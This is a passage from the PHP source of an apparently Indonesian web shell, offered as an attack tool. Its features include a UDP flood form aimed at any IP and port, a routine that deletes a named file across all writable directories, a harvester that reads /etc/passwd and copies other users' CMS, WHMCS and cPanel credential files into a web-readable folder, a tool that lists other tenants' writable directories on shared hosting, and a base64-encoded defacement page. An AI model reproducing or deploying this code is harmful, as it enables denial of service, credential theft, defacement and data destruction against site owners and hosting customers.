  1386. <tr><td>Port</td><td>:</td>
  1387. <td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
  1388. </td></tr></tr></table></b><br>
  1389. <input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">
  1390. <br><br>
  1391. <center>
  1392. <font color="white">Abis Make Ini Tools Jangan Lupa Refresh Browser Lo
  1393. </center>
  1394. </form>
  1395. </center>
  1396. <?php
  1397.     @$submit = $_POST['fire'];
  1398.     if (isset($submit)) {
  1399.         $packets = 0;
  1400.         $ip = $_POST['ip'];
  1401.         $rand = $_POST['port'];
  1402.         set_time_limit(0);
  1403.         ignore_user_abort(FALSE);
  1404.         $exec_time = $_POST['time'];
  1405.         $time = time();
  1406.         print "Flooded: $ip on port $rand <br><br>";
  1407.         $max_time = $time + $exec_time;
  1408.         for ($i = 0;$i < 65535;$i++) {
  1409.             $out.= "X";
  1410.         }
  1411.         while (1) {
  1412.             $packets++;
  1413.             if (time() > $max_time) {
  1414.                 break;
  1415.             }
  1416.             $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  1417.             if ($fp) {
  1418.                 fwrite($fp, $out);
  1419.                 fclose($fp);
  1420.             }
  1421.         }
  1422.         echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
  1423. ";
  1424.     }  
  1425. } elseif($_GET['do'] == 'mass_delete') {
  1426.     function hapus_massal($dir,$namafile) {
  1427.         if(is_writable($dir)) {
  1428.             $dira = scandir($dir);
  1429.             foreach($dira as $dirb) {
  1430.                 $dirc = "$dir/$dirb";
  1431.                 $lokasi = $dirc.'/'.$namafile;
  1432.                 if($dirb === '.') {
  1433.                     if(file_exists("$dir/$namafile")) {
  1434.                         unlink("$dir/$namafile");
  1435.                     }
  1436.                 } elseif($dirb === '..') {
  1437.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1438.                         unlink("".dirname($dir)."/$namafile");
  1439.                     }
  1440.                 } else {
  1441.                     if(is_dir($dirc)) {
  1442.                         if(is_writable($dirc)) {
  1443.                             if(file_exists($lokasi)) {
  1444.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1445.                                 unlink($lokasi);
  1446.                                 $idx = hapus_massal($dirc,$namafile);
  1447.                             }
  1448.                         }
  1449.                     }
  1450.                 }
  1451.             }
  1452.         }
  1453.     }
  1454.     if($_POST['start']) {
  1455.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1456.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1457.         echo "</div>";
  1458.     } else {
  1459.     echo "<center>";
  1460.     echo "<form method='post'>
  1461.     <font style='text-decoration: underline;'>Folder:</font><br>
  1462.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1463.     <font style='text-decoration: underline;'>Filename:</font><br>
  1464.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1465.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1466.     </form></center>";
  1467.     }
  1468. } elseif($_GET['do'] == 'config') {
  1469.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1470.     $idx = mkdir("idx_config", 0777);
  1471.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1472.     $htc = fopen("idx_config/.htaccess","w");
  1473.     fwrite($htc, $isi_htc);
  1474.     while($passwd = fgets($etc)) {
  1475.         if($passwd == "" || !$etc) {
  1476.             echo "<font color=red>Can't read /etc/passwd</font>";
  1477.         } else {
  1478.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1479.             foreach($user_config[1] as $user_idx) {
  1480.                 $user_config_dir = "/home/$user_idx/public_html/";
  1481.                 if(is_readable($user_config_dir)) {
  1482.                     $grab_config = array(
  1483. "/home/$user_idx/public_html/vb/includes/config.php" => "Vbulletin.txt",
  1484. "/home/$user_idx/public_html/includes/config.php" => "Vbulletin.txt",
  1485. "/home/$user_idx/public_html/forum/includes/config.php" => "Vbulletin.txt",
  1486. "/home/$user_idx/public_html/forums/includes/config.php" => "Vbulletin.txt",
  1487. "/home/$user_idx/public_html/cc/includes/config.php" => "Vbulletin.txt",
  1488. "/home/$user_idx/public_html/inc/config.php" => "MyBB.txt",
  1489. "/home/$user_idx/public_html/includes/configure.php" => "OsCommerce.txt",
  1490. "/home/$user_idx/public_html/shop/includes/configure.php" => "OsCommerce.txt",
  1491. "/home/$user_idx/public_html/os/includes/configure.php" => "OsCommerce.txt",
  1492. "/home/$user_idx/public_html/oscom/includes/configure.php" => "OsCommerce.txt",
  1493. "/home/$user_idx/public_html/products/includes/configure.php" => "OsCommerce.txt",
  1494. "/home/$user_idx/public_html/cart/includes/configure.php" => "OsCommerce.txt",
  1495. "/home/$user_idx/public_html/inc/conf_global.php" => "IPB.txt",
  1496. "/home/$user_idx/public_html/wp-config.php" => "Wordpress.txt",
  1497. "/home/$user_idx/public_html/wp/test/wp-config.php" => "Wordpress.txt",
  1498. "/home/$user_idx/public_html/blog/wp-config.php" => "Wordpress.txt",
  1499. "/home/$user_idx/public_html/beta/wp-config.php" => "Wordpress.txt",
  1500. "/home/$user_idx/public_html/portal/wp-config.php" => "Wordpress.txt",
  1501. "/home/$user_idx/public_html/site/wp-config.php" => "Wordpress.txt",
  1502. "/home/$user_idx/public_html/wp/wp-config.php" => "Wordpress.txt",
  1503. "/home/$user_idx/public_html/WP/wp-config.php" => "Wordpress.txt",
  1504. "/home/$user_idx/public_html/news/wp-config.php" => "Wordpress.txt",
  1505. "/home/$user_idx/public_html/wordpress/wp-config.php" => "Wordpress.txt",
  1506. "/home/$user_idx/public_html/test/wp-config.php" => "Wordpress.txt",
  1507. "/home/$user_idx/public_html/demo/wp-config.php" => "Wordpress.txt",
  1508. "/home/$user_idx/public_html/home/wp-config.php" => "Wordpress.txt",
  1509. "/home/$user_idx/public_html/v1/wp-config.php" => "Wordpress.txt",
  1510. "/home/$user_idx/public_html/v2/wp-config.php" => "Wordpress.txt",
  1511. "/home/$user_idx/public_html/press/wp-config.php" => "Wordpress.txt",
  1512. "/home/$user_idx/public_html/new/wp-config.php" => "Wordpress.txt",
  1513. "/home/$user_idx/public_html/blogs/wp-config.php" => "Wordpress.txt",
  1514. "/home/$user_idx/public_html/configuration.php" => "Joomla.txt",
  1515. "/home/$user_idx/public_html/blog/configuration.php" => "Joomla.txt",
  1516. "/home/$user_idx/public_html/submitticket.php" => "^WHMCS.txt",
  1517. "/home/$user_idx/public_html/cms/configuration.php" => "Joomla.txt",
  1518. "/home/$user_idx/public_html/beta/configuration.php" => "Joomla.txt",
  1519. "/home/$user_idx/public_html/portal/configuration.php" => "Joomla.txt",
  1520. "/home/$user_idx/public_html/site/configuration.php" => "Joomla.txt",
  1521. "/home/$user_idx/public_html/main/configuration.php" => "Joomla.txt",
  1522. "/home/$user_idx/public_html/home/configuration.php" => "Joomla.txt",
  1523. "/home/$user_idx/public_html/demo/configuration.php" => "Joomla.txt",
  1524. "/home/$user_idx/public_html/test/configuration.php" => "Joomla.txt",
  1525. "/home/$user_idx/public_html/v1/configuration.php" => "Joomla.txt",
  1526. "/home/$user_idx/public_html/v2/configuration.php" => "Joomla.txt",
  1527. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla.txt",
  1528. "/home/$user_idx/public_html/new/configuration.php" => "Joomla.txt",
  1529. "/home/$user_idx/public_html/WHMCS/configuration.php" => "WHMCS.txt",
  1530. "/home/$user_idx/public_html/whmcs1/configuration.php" => "WHMCS.txt",
  1531. "/home/$user_idx/public_html/Whmcs/configuration.php" => "WHMCS.txt",
  1532. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS.txt",
  1533. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS.txt",
  1534. "/home/$user_idx/public_html/WHMC/configuration.php" => "WHMCS.txt",
  1535. "/home/$user_idx/public_html/Whmc/configuration.php" => "WHMCS.txt",
  1536. "/home/$user_idx/public_html/whmc/configuration.php" => "WHMCS.txt",
  1537. "/home/$user_idx/public_html/WHM/configuration.php" => "WHMCS.txt",
  1538. "/home/$user_idx/public_html/Whm/configuration.php" => "WHMCS.txt",
  1539. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS.txt",
  1540. "/home/$user_idx/public_html/HOST/configuration.php" => "WHMCS.txt",
  1541. "/home/$user_idx/public_html/Host/configuration.php" => "WHMCS.txt",
  1542. "/home/$user_idx/public_html/host/configuration.php" => "WHMCS.txt",
  1543. "/home/$user_idx/public_html/SUPPORTES/configuration.php" => "WHMCS.txt",
  1544. "/home/$user_idx/public_html/Supportes/configuration.php" => "WHMCS.txt",
  1545. "/home/$user_idx/public_html/supportes/configuration.php" => "WHMCS.txt",
  1546. "/home/$user_idx/public_html/domains/configuration.php" => "WHMCS.txt",
  1547. "/home/$user_idx/public_html/domain/configuration.php" => "WHMCS.txt",
  1548. "/home/$user_idx/public_html/Hosting/configuration.php" => "WHMCS.txt",
  1549. "/home/$user_idx/public_html/HOSTING/configuration.php" => "WHMCS.txt",
  1550. "/home/$user_idx/public_html/hosting/configuration.php" => "WHMCS.txt",
  1551. "/home/$user_idx/public_html/CART/configuration.php" => "WHMCS.txt",
  1552. "/home/$user_idx/public_html/Cart/configuration.php" => "WHMCS.txt",
  1553. "/home/$user_idx/public_html/cart/configuration.php" => "WHMCS.txt",
  1554. "/home/$user_idx/public_html/ORDER/configuration.php" => "WHMCS.txt",
  1555. "/home/$user_idx/public_html/Order/configuration.php" => "WHMCS.txt",
  1556. "/home/$user_idx/public_html/order/configuration.php" => "WHMCS.txt",
  1557. "/home/$user_idx/public_html/CLIENT/configuration.php" => "WHMCS.txt",
  1558. "/home/$user_idx/public_html/Client/configuration.php" => "WHMCS.txt",
  1559. "/home/$user_idx/public_html/client/configuration.php" => "WHMCS.txt",
  1560. "/home/$user_idx/public_html/CLIENTAREA/configuration.php" => "WHMCS.txt",
  1561. "/home/$user_idx/public_html/Clientarea/configuration.php" => "WHMCS.txt",
  1562. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS.txt",
  1563. "/home/$user_idx/public_html/SUPPORT/configuration.php" => "WHMCS.txt",
  1564. "/home/$user_idx/public_html/Support/configuration.php" => "WHMCS.txt",
  1565. "/home/$user_idx/public_html/support/configuration.php" => "WHMCS.txt",
  1566. "/home/$user_idx/public_html/BILLING/configuration.php" => "WHMCS.txt",
  1567. "/home/$user_idx/public_html/Billing/configuration.php" => "WHMCS.txt",
  1568. "/home/$user_idx/public_html/billing/configuration.php" => "WHMCS.txt",
  1569. "/home/$user_idx/public_html/BUY/configuration.php" => "WHMCS.txt",
  1570. "/home/$user_idx/public_html/Buy/configuration.php" => "WHMCS.txt",
  1571. "/home/$user_idx/public_html/buy/configuration.php" => "WHMCS.txt",
  1572. "/home/$user_idx/public_html/MANAGE/configuration.php" => "WHMCS.txt",
  1573. "/home/$user_idx/public_html/Manage/configuration.php" => "WHMCS.txt",
  1574. "/home/$user_idx/public_html/manage/configuration.php" => "WHMCS.txt",
  1575. "/home/$user_idx/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS.txt",
  1576. "/home/$user_idx/public_html/ClientSupport/configuration.php" => "WHMCS.txt",
  1577. "/home/$user_idx/public_html/Clientsupport/configuration.php" => "WHMCS.txt",
  1578. "/home/$user_idx/public_html/clientsupport/configuration.php" => "WHMCS.txt",
  1579. "/home/$user_idx/public_html/CHECKOUT/configuration.php" => "WHMCS.txt",
  1580. "/home/$user_idx/public_html/Checkout/configuration.php" => "WHMCS.txt",
  1581. "/home/$user_idx/public_html/checkout/configuration.php" => "WHMCS.txt",
  1582. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS.txt",
  1583. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS.txt",
  1584. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS.txt",
  1585. "/home/$user_idx/public_html/BASKET/configuration.php" => "WHMCS.txt",
  1586. "/home/$user_idx/public_html/Basket/configuration.php" => "WHMCS.txt",
  1587. "/home/$user_idx/public_html/basket/configuration.php" => "WHMCS.txt",
  1588. "/home/$user_idx/public_html/SECURE/configuration.php" => "WHMCS.txt",
  1589. "/home/$user_idx/public_html/Secure/configuration.php" => "WHMCS.txt",
  1590. "/home/$user_idx/public_html/secure/configuration.php" => "WHMCS.txt",
  1591. "/home/$user_idx/public_html/SALES/configuration.php" => "WHMCS.txt",
  1592. "/home/$user_idx/public_html/Sales/configuration.php" => "WHMCS.txt",
  1593. "/home/$user_idx/public_html/sales/configuration.php" => "WHMCS.txt",
  1594. "/home/$user_idx/public_html/BILL/configuration.php" => "WHMCS.txt",
  1595. "/home/$user_idx/public_html/Bill/configuration.php" => "WHMCS.txt",
  1596. "/home/$user_idx/public_html/bill/configuration.php" => "WHMCS.txt",
  1597. "/home/$user_idx/public_html/PURCHASE/configuration.php" => "WHMCS.txt",
  1598. "/home/$user_idx/public_html/Purchase/configuration.php" => "WHMCS.txt",
  1599. "/home/$user_idx/public_html/purchase/configuration.php" => "WHMCS.txt",
  1600. "/home/$user_idx/public_html/ACCOUNT/configuration.php" => "WHMCS.txt",
  1601. "/home/$user_idx/public_html/Account/configuration.php" => "WHMCS.txt",
  1602. "/home/$user_idx/public_html/account/configuration.php" => "WHMCS.txt",
  1603. "/home/$user_idx/public_html/USER/configuration.php" => "WHMCS.txt",
  1604. "/home/$user_idx/public_html/User/configuration.php" => "WHMCS.txt",
  1605. "/home/$user_idx/public_html/user/configuration.php" => "WHMCS.txt",
  1606. "/home/$user_idx/public_html/CLIENTS/configuration.php" => "WHMCS.txt",
  1607. "/home/$user_idx/public_html/Clients/configuration.php" => "WHMCS.txt",
  1608. "/home/$user_idx/public_html/clients/configuration.php" => "WHMCS.txt",
  1609. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS.txt",
  1610. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS.txt",
  1611. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS.txt",
  1612. "/home/$user_idx/public_html/MY/configuration.php" => "WHMCS.txt",
  1613. "/home/$user_idx/public_html/My/configuration.php" => "WHMCS.txt",
  1614. "/home/$user_idx/public_html/my/configuration.php" => "WHMCS.txt",
  1615. "/home/$user_idx/public_html/secure/whm/configuration.php" => "WHMCS.txt",
  1616. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "WHMCS.txt",
  1617. "/home/$user_idx/public_html/panel/configuration.php" => "WHMCS.txt",
  1618. "/home/$user_idx/public_html/clientes/configuration.php" => "WHMCS.txt",
  1619. "/home/$user_idx/public_html/cliente/configuration.php" => "WHMCS.txt",
  1620. "/home/$user_idx/public_html/support/order/configuration.php" => "WHMCS.txt",
  1621. "/home/$user_idx/public_html/bb-config.php" => "BoxBilling.txt",
  1622. "/home/$user_idx/public_html/boxbilling/bb-config.php" => "BoxBilling.txt",
  1623. "/home/$user_idx/public_html/box/bb-config.php" => "BoxBilling.txt",
  1624. "/home/$user_idx/public_html/host/bb-config.php" => "BoxBilling.txt",
  1625. "/home/$user_idx/public_html/Host/bb-config.php" => "BoxBilling.txt",
  1626. "/home/$user_idx/public_html/supportes/bb-config.php" => "BoxBilling.txt",
  1627. "/home/$user_idx/public_html/support/bb-config.php" => "BoxBilling.txt",
  1628. "/home/$user_idx/public_html/hosting/bb-config.php" => "BoxBilling.txt",
  1629. "/home/$user_idx/public_html/cart/bb-config.php" => "BoxBilling.txt",
  1630. "/home/$user_idx/public_html/order/bb-config.php" => "BoxBilling.txt",
  1631. "/home/$user_idx/public_html/client/bb-config.php" => "BoxBilling.txt",
  1632. "/home/$user_idx/public_html/clients/bb-config.php" => "BoxBilling.txt",
  1633. "/home/$user_idx/public_html/cliente/bb-config.php" => "BoxBilling.txt",
  1634. "/home/$user_idx/public_html/clientes/bb-config.php" => "BoxBilling.txt",
  1635. "/home/$user_idx/public_html/billing/bb-config.php" => "BoxBilling.txt",
  1636. "/home/$user_idx/public_html/billings/bb-config.php" => "BoxBilling.txt",
  1637. "/home/$user_idx/public_html/my/bb-config.php" => "BoxBilling.txt",
  1638. "/home/$user_idx/public_html/secure/bb-config.php" => "BoxBilling.txt",
  1639. "/home/$user_idx/public_html/support/order/bb-config.php" => "BoxBilling.txt",
  1640. "/home/$user_idx/public_html/includes/dist-configure.php" => "Zencart.txt",
  1641. "/home/$user_idx/public_html/zencart/includes/dist-configure.php" => "Zencart.txt",
  1642. "/home/$user_idx/public_html/products/includes/dist-configure.php" => "Zencart.txt",
  1643. "/home/$user_idx/public_html/cart/includes/dist-configure.php" => "Zencart.txt",
  1644. "/home/$user_idx/public_html/shop/includes/dist-configure.php" => "Zencart.txt",
  1645. "/home/$user_idx/public_html/includes/iso4217.php" => "Hostbills.txt",
  1646. "/home/$user_idx/public_html/hostbills/includes/iso4217.php" => "Hostbills.txt",
  1647. "/home/$user_idx/public_html/host/includes/iso4217.php" => "Hostbills.txt",
  1648. "/home/$user_idx/public_html/Host/includes/iso4217.php" => "Hostbills.txt",
  1649. "/home/$user_idx/public_html/supportes/includes/iso4217.php" => "Hostbills.txt",
  1650. "/home/$user_idx/public_html/support/includes/iso4217.php" => "Hostbills.txt",
  1651. "/home/$user_idx/public_html/hosting/includes/iso4217.php" => "Hostbills.txt",
  1652. "/home/$user_idx/public_html/cart/includes/iso4217.php" => "Hostbills.txt",
  1653. "/home/$user_idx/public_html/order/includes/iso4217.php" => "Hostbills.txt",
  1654. "/home/$user_idx/public_html/client/includes/iso4217.php" => "Hostbills.txt",
  1655. "/home/$user_idx/public_html/clients/includes/iso4217.php" => "Hostbills.txt",
  1656. "/home/$user_idx/public_html/cliente/includes/iso4217.php" => "Hostbills.txt",
  1657. "/home/$user_idx/public_html/clientes/includes/iso4217.php" => "Hostbills.txt",
  1658. "/home/$user_idx/public_html/billing/includes/iso4217.php" => "Hostbills.txt",
  1659. "/home/$user_idx/public_html/billings/includes/iso4217.php" => "Hostbills.txt",
  1660. "/home/$user_idx/public_html/my/includes/iso4217.php" => "Hostbills.txt",
  1661. "/home/$user_idx/public_html/secure/includes/iso4217.php" => "Hostbills.txt",
  1662. "/home/$user_idx/public_html/support/order/includes/iso4217.php" => "Hostbills.txt",
  1663. "/home/$user_idx/.my.cnf" => "Cpanel.txt",
  1664. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1665. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1666. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1667. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1668. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1669. "/home/$user_idx/public_html/po-content/config.php" => "Popoji.txt",
  1670. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1671. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1672. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1673. "/home/$user_idx/public_html/config.php" => "AnyWebsite",
  1674. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  1675.                     foreach($grab_config as $config => $nama_config) {
  1676.                         $ambil_config = file_get_contents($config);
  1677.                         if($ambil_config == '') {
  1678.                         } else {
  1679.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  1680.                             fputs($file_config,$ambil_config);
  1681.                         }
  1682.                     }
  1683.                 }      
  1684.             }
  1685.         }  
  1686.     }
  1687.     echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  1688. } elseif($_GET['do'] == 'reverse') {
  1689. ?>
  1690. <br>
  1691. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'>[ Reverse IP Lookup ] </a></center>
  1692. <?php
  1693. } elseif($_GET['do'] == 'jumping') {
  1694.     $i = 0;
  1695.     echo "<div class='margin: 5px auto;'>";
  1696.     if(preg_match("/hsphere/", $dir)) {
  1697.         $urls = explode("\r\n", $_POST['url']);
  1698.         if(isset($_POST['jump'])) {
  1699.             echo "<pre>";
  1700.             foreach($urls as $url) {
  1701.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1702.                 $etc = "/etc/passwd";
  1703.                 $f = fopen($etc,"r");
  1704.                 while($gets = fgets($f)) {
  1705.                     $pecah = explode(":", $gets);
  1706.                     $user = $pecah[0];
  1707.                     $dir_user = "/hsphere/local/home/$user";
  1708.                     if(is_dir($dir_user) === true) {
  1709.                         $url_user = $dir_user."/".$url;
  1710.                         if(is_readable($url_user)) {
  1711.                             $i++;
  1712.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1713.                             if(is_writable($url_user)) {
  1714.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1715.                             }
  1716.                             echo $jrw."<br>";
  1717.                         }
  1718.                     }
  1719.                 }
  1720.             }
  1721.         if($i == 0) {
  1722.         } else {
  1723.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1724.         }
  1725.         echo "</pre>";
  1726.         } else {
  1727.             echo '<center>
  1728.                   <form method="post">
  1729.                   List Domains: <br>
  1730.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1731.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1732.             while($getss = fgets($fp)) {
  1733.                 echo $getss;
  1734.             }
  1735.             echo  '</textarea><br>
  1736.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1737.                   </form></center>';
  1738.         }
  1739.     } elseif(preg_match("/vhosts/", $dir)) {
  1740.         $urls = explode("\r\n", $_POST['url']);
  1741.         if(isset($_POST['jump'])) {
  1742.             echo "<pre>";
  1743.             foreach($urls as $url) {
  1744.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1745.                 if(is_dir($web_vh) === true) {
  1746.                     if(is_readable($web_vh)) {
  1747.                         $i++;
  1748.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1749.                         if(is_writable($web_vh)) {
  1750.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1751.                         }
  1752.                         echo $jrw."<br>";
  1753.                     }
  1754.                 }
  1755.             }
  1756.         if($i == 0) {
  1757.         } else {
  1758.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1759.         }
  1760.         echo "</pre>";
  1761.         } else {
  1762.             echo '<center>
  1763.                   <form method="post">
  1764.                   List Domains: <br>
  1765.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1766.                   bing("ip:$ip");
  1767.             echo  '</textarea><br>
  1768.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1769.                   </form></center>';
  1770.         }
  1771.     } else {
  1772.         echo "<pre>";
  1773.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1774.         while($passwd = fgets($etc)) {
  1775.             if($passwd == '' || !$etc) {
  1776.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1777.             } else {
  1778.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1779.                 foreach($user_jumping[1] as $user_idx_jump) {
  1780.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1781.                     if(is_readable($user_jumping_dir)) {
  1782.                         $i++;
  1783.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1784.                         if(is_writable($user_jumping_dir)) {
  1785.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1786.                         }
  1787.                         echo $jrw;
  1788.                         if(function_exists('posix_getpwuid')) {
  1789.                             $domain_jump = file_get_contents("/etc/named.conf");   
  1790.                             if($domain_jump == '') {
  1791.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1792.                             } else {
  1793.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1794.                                 foreach($domains_jump[1] as $dj) {
  1795.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1796.                                     $user_jumping_url = $user_jumping_url['name'];
  1797.                                     if($user_jumping_url == $user_idx_jump) {
  1798.                                         echo " => ( <u>$dj</u> )<br>";
  1799.                                         break;
  1800.                                     }
  1801.                                 }
  1802.                             }
  1803.                         } else {
  1804.                             echo "<br>";
  1805.                         }
  1806.                     }
  1807.                 }
  1808.             }
  1809.         }
  1810.         if($i == 0) {
  1811.         } else {
  1812.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1813.         }
  1814.         echo "</pre>";
  1815.     }
  1816.     echo "</div>";
  1817. } elseif($_GET['do'] == 'autoklik') {
  1818. ?>
  1819. <form method="post">
  1820. <input type="submit" name="x" value="index.php">
  1821. </form>
  1822. <?php
  1823. $target = explode("\r\n", $_POST['target']);
  1824. if($_POST['x']) {
  1825.     foreach($target as $korban) {
  1826.         $global = "index.php";
  1827.         $isi_nama_doang = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO